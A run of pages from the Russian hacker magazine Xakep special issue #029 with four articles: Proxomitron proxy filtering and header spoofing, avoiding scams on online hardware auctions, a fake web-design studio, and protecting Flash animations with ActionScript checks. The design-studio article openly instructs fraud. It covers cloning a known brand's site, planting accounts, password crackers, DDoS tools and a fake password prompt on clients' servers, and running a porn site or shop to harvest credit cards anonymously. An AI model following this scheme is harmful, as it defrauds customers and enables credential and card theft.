Теперь давай заточим этот топор под наши с тобой нужды. Для начала тыкаем кнопку config и выбираем последнюю закладку "HTTP". Настраивай порт, который тебе удобен, затем таймаут; если ты скачал модуль поддержки ssl, то скинь dll-ки в windows\system или ..\system32 и ставь галочку, теперь у тебя будет проверяться и https трафик. Закладка access позволяет настроить прокс не только на твой комп, но и на сетку целиком, если она есть, конечно. Blockfile - это те файлы, которые определяют политику в целом, разберемся с ними по очереди. AdKeys - файл правил для отрезания баннеров у сайтов, те закорючки, которые ты видишь в нем, - это и есть язык обработки строк (подробное описание будет чуть позже), тут описаны основные правила, по которым прокс определяет, что картинка является баннером. AdList - это список URL-ов с заядлыми банарейщиками, используется аналогично предыдущему списку для кастрации рекламодателей. AliasList - тот самый сервис коротких имен. Возьмем пример, поставляемый с проксой: строка "ms/ $JUMP(http://www.microsoft.com/)" будет означать "меняй адрес ".ms" на адрес мелкомягких". Все, теперь, чтобы попасть к мелкомягким, тебе достаточно набрать ".ms". Насчет последней строки, советую ее не изменять, она позволяет делать запросы на google простым набором "./drivers". Файл Bypass содержит адреса, которые не будут обрабатываться, туда можешь занести свою домашнюю страничку, чтобы не терять показы баннеров при собственном заходе. CookieList - список серваков, куки с которых можно принимать. Если выставлена опция "резать куки", то со всех остальных серваков куки будут умирать в корзине; как пример: если у тебя почта на mail.ru и ты до сих пор пользуешься веб-интерфейсом с автонабором пароля, то можешь смело прописывать мылру в этот список, чтобы не парится и не вводить каждый раз пароль. MIME-List - весьма полезная вещь для нетскейполюбов, иногда бывает так, что сервер не совсем правильно настроен или скрипт криво написан, тогда при посылке html файла и установленным типов plain-text нетшкаф просто покажет тебе исходник (черным по белому), а не ту красивую страничку, которую видит автор скрипта в IE. А все дело в том, что IE обрабатывает все страницы как HTML, а Netscape смотрит, что летит, - то и показывает. Для фикса достаточно прописать, что htm и html имеют тип "text/html". И последний файл NoImages, работает только при включенном "Kill all Images on selected pages", позволяет не качать картинки со страниц, обозначенных в списке.


Спецвыпуск Xakep, номер #029, стр. 029-066-2, МАСКИРОВКА В СЕТИ - персональный фильтр базара

МАСКИРОВКА В СЕТИ - персональный фильтр базара

Спецвыпуск Xakep, номер #029, стр. 029-066-2

Теперь давай посмотрим на главное окошко, слева есть куча галочек, по очереди сверху вниз: фильтр страницы, фильтр исходящего заголовка (версия браузера и пр.), фильтр входящего заголовка (MIME-fix и пр.), заморозка анимированных гифок и пользоваться или нет проксиком. Все эти галочки (кроме Remote proxy) отрубаются одним нажатием на кнопку Bypass. Кнопка Abort позволяет прервать все соединения одним разом, очень помогает при глобальном подвисании кучи окон. Кнопка LogWindow очень пригодится при разработке нестандартного веб-приложения, все отчетливо видно, что улетело, что прилетело и почему была ошибка, эдакий он-лайн дебаггер трафика. HTTP-Proxy это то самое место, где можно прописать внешний проксик. Я лично использовал его для проверки анонимности, потому как видно, что прилетает от проксика. Web pages и Headers используются для настройки фильтра трафика на языке метасимволов. Разбираться начнем с более простого - с Headers. Для начала - имя хедера, возьмем для разбора на запчасти LastModified. После имени стоит URL match, оставим пустой, нам все равно, с какого адреса это пришло. Header value match - чему должно быть равно значение хедера, звездочка означает, что менять будем всю строку. Replacement text - текст на что менять, пустота значит просто стирать. Теперь кратко о полях для страничного фильтра. Filter-name никак не влияет на работоспособность, URL match - таргетинг на конкретный адрес, Allow for multiple matches - означает, что таких совпадений может быть несколько на страницу и не стоит останавливаться после первой найденной. Bounds match - границы поиска, не стоит тут ставить * - это будет весьма солидно грузить тачку, а следовательно, и тормозить наш комп. Byte limit - это если было найдено начало границы, но никак нет конца (ну, забыли тег закрыть горе-дезигнеры), так вот, это максимальный размер проверяемого кусочка, это же значение используется при запоминании, если стоит "*". Matching expression - это, собственно, то, что прокс будет искать на страничке. Replacement text - на что будет заменять. Кнопочка test позволяет отдебажить наш скрипт, нажав на нее, в верхнее окошко вводим пример (я обычно ввожу просто source со странички) и давим на test; если все нормально, давим done.

Кодим в проксе

Все, с мелкими настройками покончено, теперь давай погрузимся в дебри программирования и обработки строк. Все правила абсолютно безразличны к регистру. Символ "*" это строка любых символов и любой длины. Знак "?" соответствует одному любому символу. Используя скобки "[]", можно задавать перечисления символов [asdfg], можно диапазон [a-z3-5], можно несоответствие [^a-z] = не буквы. Для чисел есть еще диапазон [#50-200], будет соответствовать числу от 50 до 200, а выражение [#3-*] значит больше трех, можно применить [#453], при этом не будет обращаться внимание на нули вначале и присутствие кавычек вокруг. Символ пробела позволяет выкидывать любое количество пробелов, идущих подряд, что весьма удобно при обработке html, при этом пробелов может не быть совсем. Очень похожа работа символа "\s", но в данном случае должен быть хотя бы один пробел для соответствия. Если надо найти или заменить именно символ табуляции, то используй "\t", аналогично перевод каретки "\r" и символ новой строки "\n". Для сравнения тегов наиболее подходящий символ "\w", он принимает любое количество символов (не пробелов или табуляций) и перестает искать, как только находит пробел или символ ">". Есть также и переменные(\0,\1...\9), которые можно брать во время поиска и подставлять после поиска. Все переменные существуют локально, то есть для каждой правила свои. Например, если надо поменять значение всех картинок, то можно проделать следующее: нужно менять "< img \1 src=* \2 >" на "< img \1 src=mypicture.gif \2 >" - таким образом у нас сохранятся все остальные параметры и поменяется только сама картинка. В переменную можно также поместить конкретное найденное слово, используя скобки: (asd\w )\1 - поместит слово, начинающееся на asd. Имеются также и логические операции, например, для поиска тега iframe или layout можно написать iframe|layout, то есть "|" это логическое "или". Для поиска "flopy disk или disk flopy" лучше использовать оператор & (логическое "и"), у нас получится disk&flopy, но это не будет соответствовать только одному из слов. Для поиска слов door и doom можно использовать круглые скобки doo(r|m), такое выражение найдет оба слова. Для поиска повторяющихся символов используй "+", то есть, чтобы заменить все doom, doooooom и dom на dem, нужно менять "do+m" на "dem". Единственная проблема: если искать r+root, то прокс ничего не найдет, так как первый символ "r" из рута съест поиск. Для того чтобы он нашел, надо использовать ++, то есть r++root, и прокс все сделает правильно. Кавычки будут соответствовать и одинарным, и двойным кавычкам. Есть также метасимволы, которые ничего не ищут, а просто производят действие. Так, например, \k убивает соединение, что полезно при фильтрации страниц. Символ "\u" - вставляет весь URL, \h - только имя хоста, \p - только путь, \a вставляет имя внутренней ссылки (якоря, то что идет в адресе после #), \d подставляет file://каталог,_где_стоит_прокометрон, удобно использовать для подмены картинок или файлов локальными. Помимо метасимволов, в последних версиях появились команды, они все начинаются с бакса. $AV - ищет значение, не смотря на кавычки, так <img src=($av(\0))\1>, теперь в \0 лежит адрес картинки, а в \1 лежит адрес в кавычках (если они были). Если надо сохранить только выражение с кавычками, то лучше использовать $avq(\0). Для сравнения с условием, которое хранится в файле, достаточно написать $lst(filename), это как команда #include в сях или флеше. Следующая команда это $nest, он позволяет искать среди тегов, так $nest(<body>,\0,</body>) запомнит все, что находится внутри тегов, в переменную "\0". Командой $set можно принудительно прописать переменную $set(0=home) или переназначить одной переменной другую $set(0=\1). Команда $stop() - остановит весь последующий поиск. Вот, собственно, и все, чем я реально пользовался, остальное можно найти в хелпе к проге.


Спецвыпуск Xakep, номер #029, стр. 029-066-3, МАСКИРОВКА В СЕТИ - персональный фильтр базара

МАСКИРОВКА В СЕТИ - персональный фильтр базара

Спецвыпуск Xakep, номер #029, стр. 029-066-3

Входящий мусор

Давай теперь попробуем рубануть тег с картинкой 468 на 60. Для этого вписываем в параметры поиска "< img * width=$av(468) * height=$av(60) >". Пиши именно так, с пробелами, все дело в том, что один пробел соответствует нескольким пробелам или ни одному пробелу, так что вреда от него не будет, но в случае присутствия пробелов в тегах он тебя спасет. Менять будем на <no img>, вот так все просто, так как по стандарту, если браузер не знает тега, то он ничего не должен делать, это сделано для совместимости разных версий браузеров. Резать по урлу еще проще, нужно только поменять src=... на локальный файл или аналогично предыдущему. Но помни, если ты меняешь на пустоту, то есть вероятность, что у тебя собьется дизайн сайтика. Хотя, если честно, для отреза рекламы в проксе достаточно предустановленных скриптов, нужно только их включить.

Исходящий мусор

Вот тут можно на славу поиздеваться над админами и создателями хитроумных скриптов на сайтах, потому как большая часть их просто скидывает в лог-файл все то, что у тебя прописано по умолчанию в твоем браузере. Давай для начала сменим ему имя, для этого можно воспользоваться стандартным, установленным фильтром, который называется "User-agent: чего-то-там"; вот вместо "чего-то-там" и вписывай то, что тебе больше по душе. Можешь написать там IE, можешь написать нетшкаф, дело твое, по умолчанию предыдущая версия проксомитрона вписывала туда "Space-bison", что в принципе тоже выход. Только не забывай, что если ты там напишешь что-нибудь "эдакое", то тебя будут везде и всюду узнавать, поскольку ты будешь единственным челом на всю планету с таким браузером, так что, убегая от анонимности, не стоит ходить в бронежилете и в шубе летом.


Спецвыпуск Xakep, номер #029, стр. 029-066-4, МАСКИРОВКА В СЕТИ - персональный фильтр базара

МАСКИРОВКА В СЕТИ - персональный фильтр базара

Спецвыпуск Xakep, номер #029, стр. 029-066-4

Все, имя мы поменяли, теперь давай перестанем передавать ссылки, то есть когда ты кликаешь по ссылке и переходишь на другой сайт, на тот сайт отправляется строчка "referer", где и написано, откуда именно ты пришел. Для того чтобы никто не знал, откуда ты только что прилетел, достаточно туда вставлять пустоту, а если хочешь немного поднять посещаемость на своей домашней страничке, то можешь вписать ее туда. Помни, что на некоторых сайтах строка referer является как бы заменой пароля, это, конечно, не правильно, и ее легко подделать, но многие записнушки и чатники этим пользуются. Кстати, если подменять эту строку, то все баннеры, которые ты увидишь, не зачислят показов на счет автора сайта, так как баннерные службы тоже следят за строкой referer. Тут же находится и наш с тобой список алиасов к сайтам, так что не стоит отрубать все, если что-нибудь не так работает, как тебе надо.

Халява!

Теперь давай поговорим о не совсем стандартном использовании проксы, мы будем использовать его для заказа халявы. Поверь, даже ко мне в Тмутаракань прилетает халява, не все, конечно, но процентов 15 долетает в целости и сохранности. Давай разберем один из листингов, что нам надо делать и как. Во-первых, нам надо найти сайт с халявой, я не буду писать никакие адреса, потому как за рекламу ни мне, ни журналу никто не платил, потрудись, поищи сам, не забывай про яндекс. Нашел? Молодец, теперь берем форму, которую нам надо заполнить, и мы увидим на ней "First Name", что есть наше имя. Открывай сырец, можешь скатать все, но пригодится только та часть, которая стоит между <form...> и </form>. Открой свой прокс, заходи в Web pages, мы будем вписывать имя прямо в форму, а не при посылке, для того чтобы можно было контролировать процесс и, если что, дописать или переписать наш скрипт. Теперь создавай новый фильтр, советую начало имени фильтрам давать одинаковые, например, "xalyava_Fname", так их будет легче отыскать в списке. Не начинай с Bounds match, ускорением и шлифовкой займешься в самом конце, сначала движок. В match expression впиши "<input * name=$AV(*first*)", в replacement вписываем value="Vasya pupkin" и жмем test. В верхнее окошко вписывай исходник с халявной странички (пока достаточно вписать ту строку, где написано что-то вроде "<input type=text ... name="FirstName">", поищи, должно быть обязательно. Дави тест, и мы видим, что он просто заменил строку целиком - вместо вписывания твоего имени. Для того чтобы он сохранил старое, нужно это где-нибудь запомнить. Поэтому добавим переменных, чтобы получилась следующая строка поиска "( < input * name = $AV(*first*) * )\1 >", а внизу \1 value="VasyaPupkin">. Если ты сделал все по рецепту, то все должно работать, и не забывай про пробелы, вставляй их везде и всюду, лишними они не могут быть. Давай теперь разберемся, как это работает. Сначала прокс ищет треуголку "<", потом слово input, потом параметр name, равный чему-то-first-чему-то, и если это найдено, при условии, что в этой же строке есть закрывающая треуголка, записывает все в переменную 1. Затем вписывает все, что запомнил, кроме закрывашки, добавляем наше имя (value=...) и закрываем тег вручную, поскольку закрывашку мы не сохраняли в памяти. Теперь давай немного переделаем фильтр, используя границы, что ускорит его работу. Для этого в границах надо поместить "< input * >", то есть будем искать только в этом теге, тогда в поиске останется "( * name = $AV(*first*) * )\1 >", длину границ можешь поставить 1024, этого сполна хватит на одну строку. Жми Ok, включай свой фильтр (установи галочку), жми Apply, и если не выскочили ошибки, жми Ok.

Нажав на зеленую дискетку, можешь сохранить свой скрипт на диск, в файл загружаемый по умолчанию. Все, теперь ты знаешь, как подставить имя, также можно подставить фамилию, адрес и прочую ерунду. При боевых испытаниях ты увидишь, что вся форма за тебя уже заполнена и тебе остается только согласиться. Проверить работу скрипта можно нажав на "Log window", в окне пурпурным цветом будет что-то вроде "Match 556: xalyava_Fname", что значит - "ваше правило 556 сработало". Не забывай, что иногда имя называют просто "name" или "Fname". Для простоты создания похожих фильтров используй кнопочку "dupe", которая копирует выделенный скрипт и дает тебе его отредактировать. Лично я всегда считал, что лучше день потерять, зато потом за пять минут долететь, так что если ты хочешь автоматизировать что-то с вебом, это лучший и, как ни странно, бесплатный способ сделать это. Главное - не забудь отключить все эти автозаполнения, когда будешь ходить по порносайтам, а то много чего им интересного сообщишь. Все, удачной тебе настройки и изучения скриптов, а я пойду закажу пару десятков дисков, пора менять обои на стенах.


Спецвыпуск Xakep, номер #029, стр. 029-070-1, ОРГАНИЗОВАННОЕ КИДАЛОВО - чудеса на интернет-аукционах

ОРГАНИЗОВАННОЕ КИДАЛОВО - чудеса на интернет-аукционах

Demetras (da2001@bk.ru)

Спецвыпуск Xakep, номер #029, стр. 029-070-1

Хая, дорогие, богатые и жадные до денег читатели!

Сегодня побазарим о том, как сэкономить баблосы (именно сэкономить, а не про... кхм - ну ты понял), покупая себе новую железяку. Другими словами, я расскажу о том, что это такое, как кидают народ на этих аукционах и, соответственно, как от этого защититься.

Шо есть интернет-аукцион?

Система проста до безобразия. Сначала регистрация в системе; зарегистрировавшись, получаешь логин и пароль и, прилогинившись к системе, можешь делать свои ставки и выставлять свои товары (в меню по категориям). У каждого отдельного аукциона есть свои собственные фичи и правила. И также совершенно на любом аукционе кидают и покупателей, и продавцов. Сейчас мы, не спеша и подробно, расковыряем всю эту бодягу с целью избежать приколов, покупая/продавая железо на таком аукционе.

Покупаем!

Итак какой-то хрен продает как раз ту железку, которую ты так долго искал, еще вроде бы и дешево, хочется купить... "Ну и где меня тут могут кинуть?" - спросишь ты. А везде ;))). Любой аукцион работает таким образом: товар выставляется на продажу на определенное время - от 3 дней до 1 месяца, и, следовательно, побеждает в торгах последний сделавший ставку. Чтобы не дать победить на торгах вон тому хмырю, который уже неделю бьет все ставки, делаем так: не будем выкидывать кучу баблосов на попытки отвадить его от железки, а тихо уходим в подполье (типа забили) и просто... ждем окончания аукциона. Вернее, ждем последних минут и в последнюю минуту делаем свою ставку. Все, товарисч идет гулять, а ты получаешь координаты продавца и идешь за покупкой.

И это все? Не-е-ет ;), стрижка только начата! Теперь, в зависимости от количества буказоидов, взятых тобой, собирай толпу орбитов с ксилитами и диролами, трех человек (кроме тебя) средней комплекции должно хватить. Без орбитов не обойтись, так как одно из самых распространенных прокидываний состоит в том, что покупателю просто дают по башке и забирают все, что есть. Конечно, это касается дорогих покупок, а если ты покупаешь ленту для своего матричного принтера, можешь смело идти один :). Встречаться лучше в людном месте, имхо, больше всего подходит метро. Там всегда тепло, много народу и мухи не кусают :).

Если ты покупаешь то, исправность чего на глазок определить нельзя, обязательно требуй манибек, дня на три, и паспорт продавца (переписываем все от А до Я). Если девайс к тому же еще и дорогой, берем расписку, иначе если он окажется битым - придется привлекать все того же орбита с диролом, а это не есть гуд, и по закону ничего ему (продавцу) не предъявишь.

Если сам не хочешь надурить продавца, требуй, чтоб он переписал при тебе серийник девайса, чтобы в случае чего не было гнилых отмазок, что ты, мол, железку подменил.

Также очень распространенный способ прокидывания заключается в том, что вместо обещанной железки тебе приносят похожую, но в -дцать раз дешевле. Поэтому перед покупкой обязательно надо со всех сторон исследовать покупаемый девайс. Сначала дома полазить по Инету на предмет внешнего вида, модели и возможных багов данной железки, потом уже на месте (при покупке) внимательно осмотреть, обнюхать (это не прикол - если железка участвовала в какой-нибудь локальной катастрофе компа или, к примеру, сама не в меру греется при работе, от нее будет фанять, и, соответственно, есть большая вероятность, что она будет безбожно бажить), ну и попробовать на зуб (шутка).


Спецвыпуск Xakep, номер #029, стр. 029-070-2, ОРГАНИЗОВАННОЕ КИДАЛОВО - чудеса на интернет-аукционах

ОРГАНИЗОВАННОЕ КИДАЛОВО - чудеса на интернет-аукционах

Demetras (da2001@bk.ru)

Спецвыпуск Xakep, номер #029, стр. 029-070-2

Еще надо обращать внимание на то, у кого ты покупаешь. Если это будут два волосатых хмыря, от которых несет перегаром, и по всем признакам видно, что через полчаса они будут, ужравшись, валяться под каким-нибудь забором, то в любом случае деньги свои ты уже не увидишь. А железка может оказаться ворованной, так что если через несколько дней к тебе приедет наряд в соответствующем прикиде и с автоматами, удивляться будет нечему. В лучшем случае заберут девайс, в худшем могут и посадить (сознательная скупка краденного - уголовно наказуема).

Покупать на аукционе целый комп - это вообще экзотика даже для извращенцев. Это я почувствовал на своей шкуре, когда купленный писюк после 20 минут работы 3.14zнул так, что полетели искры и пошел дым. После разбора полетов выяснилось, что умники, продавшие комп, восстанавливали порезанные контакты на видюхе, кусок контакта оторвался и коротнул шину (ой, ой, ой - кто-то недавно сам призывал восстанавливать контакты и продавать - прим. ред.). В результате чего просто-напросто взорвалась микруха контроллера. С этим компом все обошлось, и черти, продавшие его (видать, на тот момент совесть они еще не совсем пропили), просто поменяли мать, а могло быть все по-другому.

Последнее и самое сложное: ситуация, когда хочется сразу (при покупке) посмотреть девайс в действии, ситуация одинаково сложная как для продавцов, так и для покупателей, так как надо идти к кому-то (неизвестно кому) на хату или везти к себе. Если девайс не слишком большой, можно с чистой совестью везти к себе и встречать в компании диролов и орбитов (всякое бывает), а если железка типа 19" монитора, то придется ехать все с теми же друзьями-диролами. Причем надо все рассчитать так, чтоб у "продавца" не возникло ни возможности, ни желания дать по башке покупателю.

Продаем!

Так, теперь будем продавать. С продажей, конечно, попроще, но в этом тоже есть свои приколы.

При выставлении девайса на аукцион на экран вылезет нехилое меню, в котором ты должен выбрать, для какого города аукцион, готов ли ты слать свою железку в какое-нибудь Ново-Гребенево и т.д., но самой западлючной опцией является указание блиц-цены, то есть той цены, за которую товар можно купить мгновенно. Например, ты захотел загнать свою старую видюху и выставил ее на аукцион за гроши, практически за пыво, а на аукционе уже есть несколько таких видюх, причем выставленных за большее количество буказоидов. Естественно, тот, кто их выставил, просто возьмет и "купит" твою по блиц-цене. Естественно, в реале он у тебя ее не возьмет (конкуренция батенька), так что блиц-цену никогда не ставь. Ну и соответственно, ты как продавец должен тщательно косить от всего вышенаписанного и делать все с точностью наоборот, ведь аукцион это такая хитрая штука, где единственное правило это "не нагребешь - не проживешь", так что стоит быть внимательнее ;).


Спецвыпуск Xakep, номер #029, стр. 029-070-3, ОРГАНИЗОВАННОЕ КИДАЛОВО - чудеса на интернет-аукционах

ОРГАНИЗОВАННОЕ КИДАЛОВО - чудеса на интернет-аукционах

Demetras (da2001@bk.ru)

Спецвыпуск Xakep, номер #029, стр. 029-070-3

З.Ы.

Такие вещи, как винт и память, лучше вообще не покупать на аукционах, а купить в нормальной фирме с гарантией, так как их баги могут вылезти далеко не сразу. А с винтами вообще мрак, достаточно опытный хрюндель способен надурить с этим делом даже хороший сервис-центр, поэтому если ты не гуру в этом вопросе - даже не думай. С мониторами мрак еще гуще, так как часто бывает, что в мониторе села труба, а перец просто взял и покрутил строчник, повысив на ней напряжение, такой монитор проработает от силы полгода, после чего уйдет практически на свалку. А если это к тому же крутой 19" Сони, купленный за 500 грин (самое меньшее),

сам понимаешь, настроение у тебя будет хреновое очень долго. Если это сидюк или блок питания, то уже дома стоит его аккуратно открыть и обсмотреть на предмет ремонта. Криво отремонтированный бп может спалить весь комп, а в сидюках достаточно часто вылетают механика и микросхема, раскручивающая моторчик, раскручивающий диск (о как загнул!). После ремонта оно, конечно, работает, но не так долго, как хотелось бы ;\. Еще раньше встречались умельцы, которые редактировали биос на видюхе и за несколько минут превращали дешевую тнт ванту в дорогую ультру, или занижающие частоты бракованной видюхи для того, чтобы она перестала глючить. Как сейчас с этим обстоит дело, я без понятия, поэтому надо быть повнимательней. Вообще, помни, что большая (если не бoльшая) часть продаваемого на аукционах железа либо ремонтированная и бажная, либо просто ворованная. Надо ли это тебе вообще - решай сам.


Спецвыпуск Xakep, номер #029, стр. 029-072-1, Левая дизинг-контора

Левая дизинг-контора

ХрымZ (hrimz@xyligan.ru)

Спецвыпуск Xakep, номер #029, стр. 029-072-1

Привет! Итак на повестке (в военкомат звать не буду, так что не парься :)) дня у нас веб-обман. Будем надувать честной народ пачками, нарушать авторские права и иметь неправомерный доступ к чужым компьютерным ресурсам - так, для разминки :).

Сейчас, если тебе лень ваять свою пагу и ты обладаешь некоторым количеством бабла, то можешь возложить всю черную работу на чужие плечи, с тебя же требуется только плата и контент. Любой уважающий себя хостинг предлагает услуги дизайна и разработку веб-проекта. Качество их работ чаще всего оставляет желать лучшего, и тогда, может быть, стоить посмотреть в сторону частных дизинг-контор (государственных пока не видел :). Выбор просто огромен, и все вроде бы выглядит солидно: привлекательное оформление сайта, домен второго уровня, невысокие цены и полная гарантия всего, чего только можно. Как ты, может быть, догадался, здесь тоже не все бывает чисто. Даже если бренд известен. Вот об этих случаях мы и поговорим.

Как попасть

Да очень просто. После изучения листинга, который тебе выплюнул поисковик, ты выбираешь наугад одну из неизвестных или известных контор, бредешь на главную пагу. Далее изучаешь тарифы, договариваешься и т.д. С тобой вежливы, обходительны, предлагают, кроме создания сайта, еще и заняться его обслуживанием, то есть просят полный доступ к хостингу и всю инфу о домене (если таковой оплачен). Подумав, ты соглашаешься, да даже в случае отказа все равно попадаешь. Об обмане ты, может быть, даже и не узнаешь либо не будешь знать до закрытия конторы и заметания всех следов :). А все дело в том, что твои бравые дизайнеры, помимо всякой графики, страничек и скриптов, еще установили свое дополнительное программное обеспечение, так сказать :). Что им не мешает положить переборщик паролей, утилиты для DDos или просто проводить сложные математические расчеты за счет твоего бабла за хостинг. Или, в случае установки сервака у себя дома или на работе, создать дополнительную учетную запись и юзать шелл, когда вздумается. После заливки файла к тебе можно закачать перловый скрипт, который выводит сначала "левое" приглашение для ввода пароля, а затем уже реальное. Но тебе от этого не легче, ведь заветный пассворд уже в руках у злобных хакеров. В общем, вариантов может быть просто уйма.

Как это делается

Теперь рассмотрим теоретическую часть "Курса молодого кидалова" :). Собирай друганов, ваяйте сайт достойный, заливайте на хостинг, выбирайте звучный домен (можно даже бесплатный третьего уровня) и в бой. Делайте рекламу на различных порталах, занимайтесь спамом, примеры работ для солидности можете спереть у любых других "дизайнеров" :). Вообще-то, раскруткой не злоупотребляйте, а если лень заниматься рекламой, можно вообще поступить грязнее и легче. Выбираешь раскрученный бренд и полностью сдираешь дизайн, только заливаешь на свою пагу и прописываешь свои мейл-адреса. Не советую региться в домене .ru, так как, в случае чего, до тебя будет легче докопаться. Лучше выбери неприметную компанию по продаже забугорных доменов. Короче, надо полностью действовать от их лица и не особо этим афишировать и светиться. Очень здорово в этом тебе может помочь созвучное имя домена. Согласись, мало кто допрет, что сайт http://designing.businesscreations.com c офигенным дизигном - это на самом деле пустышка на бесплатном (!) хостинге, слепленная на коленке за десять минут. Просто стоит поискать бесплатные импортные хостинги с интересными названиями и придумать гармоничный поддомен. Или зарегить что-нибудь очень соблазнительное – www.artdesignstudio.com вполне сойдет :).


Спецвыпуск Xakep, номер #029, стр. 029-072-2, Левая дизинг-контора

Левая дизинг-контора

ХрымZ (hrimz@xyligan.ru)

Спецвыпуск Xakep, номер #029, стр. 029-072-2

Рано или поздно к вам начнут падать письма с заказами. Добросовестно все выполняем и радуем заказчика, так как он всегда прав :). Далее следует главная часть нае... обмана ;). Можешь вставлять в скрипты любую нужную тебе мурню, скрытые баннеры, счетчики, да хоть искусственный интеллект :). Чаще всего заказчик - это не шарящий в компах дядька с баблом, которому нужно красивое представительство своей компании в сети. Короче, мути все, что хочешь, и наслаждайся халявой, хотя нет, тебе ведь за это еще и платить будут :). Кстати, об оплате. Юзай какую-нибудь из систем электронных платежей - удобно и достаточно анонимно. О том, что это за зверь, - читай прошлый номер Спеца.

Только дизайн?

Нет. Такую хрень можно замутить практически с любым видом услуг, где для ее исполнения тебе что-то предоставляется от заказчика. Например, старый, как Amiga, вариант. Клепаешь порносайт или онлайн-шоп с кредитной оплатой. И после каждой покупки у тебя пополняется список пластика (кредиток то есть) со всей инфой о владельце. Вариант с порносайтом куда лучше онлайн-магазина, так как ведь не собираешься никуда ничего высылать их товаров, а вот порнухи нарыть в нете и к себе залить - дело скорости подключения. В общем, напрягай репу, и все должно само придуматься :). Ведь именно так поступают все профессиональные хакеры.

Грязная совесть

Все эти махинации редко оставляют совесть чистой, но все же бывают приятные исключения :). Многие просто юзают это временно, а потом сворачиваются, некоторые используют это для взлома конкретной системы или просто из ненависти ко всему рунету или злобной мести Темке Лебедеву :). Есть же чуваки, которые уже занимаются этим больше года и пока никаких недовольств со стороны юзеров не ощущают. То есть не обязательно надувать каждого клиента, можно ведь и выборочно :). Обычная законная работа, просто с "небольшими" махинациями, а кто сейчас без этого? С другой стороны, юзать весь этот стафф против хорошего народа просто должно быть противно, а у каждого хакера должна быть этика (хотя? :). Не буду продолжать читать тебе лекцию про совесть - сам со своей разберешься. Я же просто даю инфу к размышлению.

Аутро

Вот и все, что я хотел тебе поведать об общих принципах разводки пользователей сторонними мастерами добрых дел. Мой тебе совет, если не хочешь попасть, - делай пагу собственноручно, да и опыту наберешься, а уж если сам решил этим заняться, то подходи к делу со всей серьезностью, и главным твоим правилом должна стать анонимность. Удачи!


Спецвыпуск Xakep, номер #029, стр. 029-074-1, МУЛЬТИКИ ПОД ЗАМКОМ - защищаем авторские Flash'ки

МУЛЬТИКИ ПОД ЗАМКОМ - защищаем авторские Flash'ки

Человек-Утюг

Спецвыпуск Xakep, номер #029, стр. 029-074-1

(ironman@winfo.org)

Мы, флешеры, очень несчастливые люди. Мало того, что у нас прут идеи для мультиков, так у нас еще прут и сами мультики, и даже их отдельные куски.

Наши проблемы просто не поддаются описанию. Так что лучше я расскажу о них на своем примере и примере моих хороших друзей. С нами за последние полгода произошли следующие нехорошие вещи.

1. Здорово нарисованный мультик на тему переписи населения был выложен на одном из сайтов моих друзей, чтобы повысить посещаемость. Для этого линка на пагу с флешкой и счетчиком была выложена в конфе "Авто-Юмор", откуда немедленно потекли посетители. Но какой-то хитропопый чел через пару дней запостил в эту же конфу (а заодно и в пару похожих) линку на наш же мульт, но выложенный на СВОЕМ сайте. В итоге куча народу начала крутить счетчик ему, а мы остались с носом. Вернее, с теми двенадцатью посетителями, которые кликнули по логотипу студии в конце мульта и отправились к нам на сайт. Наказать чувака так и не смогли.

2. Задизайненное одним из моих корешей меню для домашней страницы с офигенными эффектами и, тем не менее, малым весом было сперто и использовано на пяти (!) сайтах без изменений. А все потому, что он не прописал глобальные ссылки на кнопках и довольствовался локальными (типа ./index.html).

3. Одна из моих авторских открыток ко дню святого Валентина опять же была нахально декомпилирована, копирайты потерты, а саундтрек заменен. И все это через три дня после первого появления мульта в сети.

Короче, воруют по-черному, как ты понял :(. И если ты можешь замастырить крутейший мульт или заставку, или хотя бы менюху - ты должен уметь и защитить их от мерзких плагиаторов и любителей погреться за чужой счет. Декомпиляторами мы заниматься не будем, а вот от плагиаторов уворачиваться научимся.

ЗАЩИТА ПРОСТЕЙШАЯ, ЛОКАЛЬНАЯ

Для того, чтобы воспретить просмотр твоей флешки не с твоего сайта, надо ее как-то к нему привязать. Самый очевидный способ это сделать - заюзать небольшой текстовичок, лежащий в той же директории, что и флешки. Основная идея метода в том, что мульт в нужном кадре стопится, а затем проверяется некое условие. Условие это обычно выглядит как "переменная=1", где переменная за шаг до этого подгружается из злополучного текстовика. И если условие не соблюдено (а если текстовика нет, то и соблюстись оно не может в принципе), он просто говорит gotoandplay на кадр раньше. Метод этот обладает стопроцентной надежностью, так как мульт не будет просматриваться дальше злополучного кадра, даже если нажать смесь батонов Ctrl-Right (юзер, однако, умный пошел :)). А все потому, что мы еще и подстраховались концом очередной сцены. В коде это выглядит примерно так:

В клипе с проверкой:

onClipEvent(load){

loadVariables("copyright.txt", this)

}

В файле copyright.txt:

nesperli=1

В предпоследнем кадре (у меня он стоит под номером 175):

stop;

В эшенсах кнопки "Далее" (или как она там у тебя называется):

play;

В последнем заподлянском кадре (с номером 176):

if (this.nesperli=1){

gotoandplay("Scene 2",1)

}else{

gotoandplay(175)

}

Вот тебе и весь геморрой :). В моем случае после окончания заставки мульт останавливается до нажатия кнопки "Поехали!". Но если файла рядом нет - нажимай, не нажимай - дальше мульт не двинется :). Советую запомнить костяк кода (там, где подгружается переменная), ибо нам он еще не раз пригодится.


Спецвыпуск Xakep, номер #029, стр. 029-074-2, МУЛЬТИКИ ПОД ЗАМКОМ - защищаем авторские Flash'ки

МУЛЬТИКИ ПОД ЗАМКОМ - защищаем авторские Flash'ки

Человек-Утюг

Спецвыпуск Xakep, номер #029, стр. 029-074-2

ЗАЩИТА ГЛОБАЛЬНАЯ, ЗАПОДЛЯСКАЯ

Теперь попробуем модифицировать защиту для мультов, просмотр которых стоит ограничить. Так, например, Квер (я думаю, ты помнишь его по статье folder.htt в прошлом номере) в одном из своих дебютных мультов обстебал одного нашего одногруппника. Мульт был выложен на моей хоумпаге, паге дружественного нам проекта RealKlya и неофициальном сайте институтской группы. Посмотрели его все, за исключением жертвы, которая, как водится, узнала обо всем последней :). Так вот, эта самая невинная жертва (Гриня, не обижайся) решила-таки посмотреть мульт. Но сделать ей этого не удалось :). Впрочем, не удалось это сделать больше никому. И вот почему.

В мульт изначально был заложен тот же механизм защиты, но вот незадача - ссылка на файл была прописана глобальная. Таким образом, подкорректировав файл, выложенный на RealKlya, я ограничил доступ ко ВСЕМ копиям Кверова мультика :). По-моему, очень удобно, если ты решишь вдруг взять свои слова назад. Или полюбоваться валяющимся в ногах Гриней, выспрашивающим, как же все-таки посмотреть злобную флешку.

Теперь код. Чисто технически все остается по-прежнему, меняется только одна строка:

loadVariables("http://realklya.nm.ru/greenya/copyright.txt", this)

